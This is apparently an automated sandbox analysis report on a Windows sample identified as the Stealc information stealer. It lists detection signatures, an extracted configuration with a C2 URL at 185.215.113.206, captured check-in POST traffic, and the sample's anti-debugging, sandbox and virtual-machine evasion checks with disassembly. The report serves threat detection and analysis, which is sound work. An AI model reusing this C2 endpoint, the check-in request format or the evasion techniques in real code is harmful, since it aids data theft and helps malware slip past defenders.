Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544422
MD5: 345e2a6577340e9722715c9a42736169
SHA1: 48ebfe09a9482f6289a7db2523594bab4d600a08
SHA256: 1b8052833a2230173369c09749f616b2bf4812983ed541d803f24afdfb01caa0
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 345E2A6577340E9722715C9A42736169)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6396 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6396 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.700000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T12:04:12.693723+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.700000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007072A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00701710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007147C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00714B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00713B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------HCAFIJDGHCBFHJKFCGIE
    Content-Disposition: form-data; name="hwid"

    9404286E51693196934881
    ------HCAFIJDGHCBFHJKFCGIE
    Content-Disposition: form-data; name="build"

    tale
    ------HCAFIJDGHCBFHJKFCGIE--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007062D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------HCAFIJDGHCBFHJKFCGIE
    Content-Disposition: form-data; name="hwid"

    9404286E51693196934881
    ------HCAFIJDGHCBFHJKFCGIE
    Content-Disposition: form-data; name="build"

    tale
    ------HCAFIJDGHCBFHJKFCGIE--
Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phphc_
Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00740098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00732138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075B198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00744288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A123A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B54336
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B60304
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00724573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072E544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B59533
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF5515
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007445A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007896FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007466C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075D720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5E739
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B63707
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00776799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00754868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007598B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075B8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABD961
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B57AA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5CBCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00768BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FFB5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00774BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00770B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC3C22
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B66C19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC4C1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00731D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075BD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B61D2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00754DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00755DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00748E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00771EE8
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00704610 appears 316 times
Source: file.exe | Static PE information: Section: oqzwigwm ZLIB complexity 0.9946159456084104
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00713970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\7VPW6J5H.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2155008 > 1048576
Source: file.exe | Static PE information: Raw size of oqzwigwm is bigger than: 0x100000 < 0x1a3200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oqzwigwm:EW;bpeuitit:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oqzwigwm:EW;bpeuitit:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x218841 should be: 0x2104bd
Source: file.exe | Static PE information: section name: oqzwigwm
Source: file.exe | Static PE information: section name: bpeuitit
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 02A74567h; mov dword ptr [esp], edx (0_2_00B5B111)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push edi; mov dword ptr [esp], 7DF5B252h (0_2_00B5B118)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push esi; mov dword ptr [esp], edx (0_2_00B5B121)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 0439610Bh; mov dword ptr [esp], ebx (0_2_00B5B25E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push edi; mov dword ptr [esp], ecx (0_2_00B5B315)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 791D60FAh; mov dword ptr [esp], edi (0_2_00B5B335)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 56B8C812h; mov dword ptr [esp], eax (0_2_00B5B3BB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ecx; mov dword ptr [esp], 7FE22791h (0_2_00B5B3D2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 7D8DCB00h; mov dword ptr [esp], ebp (0_2_00B5B408)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ecx; mov dword ptr [esp], edi (0_2_00B5B490)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push eax; mov dword ptr [esp], edi (0_2_00B5B559)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ecx; mov dword ptr [esp], 23DD5600h (0_2_00B5B601)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ebx; mov dword ptr [esp], 76EEAF05h (0_2_00B5B676)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 7A850C21h; mov dword ptr [esp], eax (0_2_00B5B690)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ebp; mov dword ptr [esp], 5FDCD42Ch (0_2_00B5B6A0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ecx; mov dword ptr [esp], edi (0_2_00B5B730)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 430AE650h; mov dword ptr [esp], eax (0_2_00B5B743)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 501F85B5h; mov dword ptr [esp], ebp (0_2_00B5B776)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push esi; mov dword ptr [esp], ecx (0_2_00B5B7A7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 0955A58Ah; mov dword ptr [esp], eax (0_2_00B5B7E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ebx; mov dword ptr [esp], edx (0_2_00B5B8AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push edx; mov dword ptr [esp], esi (0_2_00B5B98C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push eax; mov dword ptr [esp], ebp (0_2_00B5B9A9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 121741A0h; mov dword ptr [esp], ebx (0_2_00B5B9F9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ebx; mov dword ptr [esp], ecx (0_2_00B5BA69)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push ebp; mov dword ptr [esp], 37F9876Ah (0_2_00B5BAEE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push edx; mov dword ptr [esp], 16FA4CE7h (0_2_00B5BB95)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 5790FB99h; mov dword ptr [esp], ebp (0_2_00B5BBA4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 2ACD73C1h; mov dword ptr [esp], eax (0_2_00B5BBB2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push esi; mov dword ptr [esp], 6AB7E652h (0_2_00B5BC64)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5B087 push 27B2F78Fh; mov dword ptr [esp], ebp (0_2_00B5BCD9)
Source: file.exe | Static PE information: section name: oqzwigwm entropy: 7.953066845220626

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37959)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9EE33B second address: 9EE345 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 jo 00007EFD6CF3F376h
    0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9EE345 second address: 9EE349 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9EE349 second address: 9EDC40 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 pop edx
    0x00000007 pop eax
    0x00000008 mov dword ptr [esp], eax
    0x0000000b pushad
    0x0000000c mov ebx, dword ptr [ebp+122D2BDDh]
    0x00000012 mov bl, 35h
    0x00000014 popad
    0x00000015 push dword ptr [ebp+122D1211h]
    0x0000001b jmp 00007EFD6CF3F37Fh
    0x00000020 mov dword ptr [ebp+122D2EAEh], eax
    0x00000026 call dword ptr [ebp+122D190Dh]
    0x0000002c pushad
    0x0000002d jmp 00007EFD6CF3F380h
    0x00000032 pushad
    0x00000033 jnp 00007EFD6CF3F380h
    0x00000039 mov dword ptr [ebp+122D1B70h], eax
    0x0000003f popad
    0x00000040 xor eax, eax
    0x00000042 cmc
    0x00000043 mov edx, dword ptr [esp+28h]
    0x00000047 mov dword ptr [ebp+122D1B70h], ecx
    0x0000004d mov dword ptr [ebp+122D2A7Dh], eax
    0x00000053 or dword ptr [ebp+122D1B70h], eax
    0x00000059 mov esi, 0000003Ch
    0x0000005e sub dword ptr [ebp+122D1B70h], edx
    0x00000064 add esi, dword ptr [esp+24h]
    0x00000068 jp 00007EFD6CF3F37Ch
    0x0000006e lodsw
    0x00000070 mov dword ptr [ebp+122D3239h], edx
    0x00000076 add eax, dword ptr [esp+24h]
    0x0000007a sub dword ptr [ebp+122D1B70h], edi
    0x00000080 jmp 00007EFD6CF3F386h
    0x00000085 mov ebx, dword ptr [esp+24h]
    0x00000089 cld
    0x0000008a push eax
    0x0000008b push edx
    0x0000008c pushad
    0x0000008d push edi
    0x0000008e pop edi
    0x0000008f push eax
    0x00000090 push edx
    0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6E62E second address: B6E64D instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 popad
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 jmp 00007EFD6CDBF8A5h
    0x0000000b push eax
    0x0000000c push edx
    0x0000000d push eax
    0x0000000e push edx
    0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6E64D second address: B6E653 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pushad
    0x00000005 popad
    0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E653 second address: B6E685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007EFD6CDBF89Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007EFD6CDBF8A5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DE78 second address: B6DE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DE81 second address: B6DE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7003B second address: B70041 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70041 second address: B7005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B701CD second address: B701D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFD6CF3F376h 0x0000000a popad 0x0000000b rdtsc
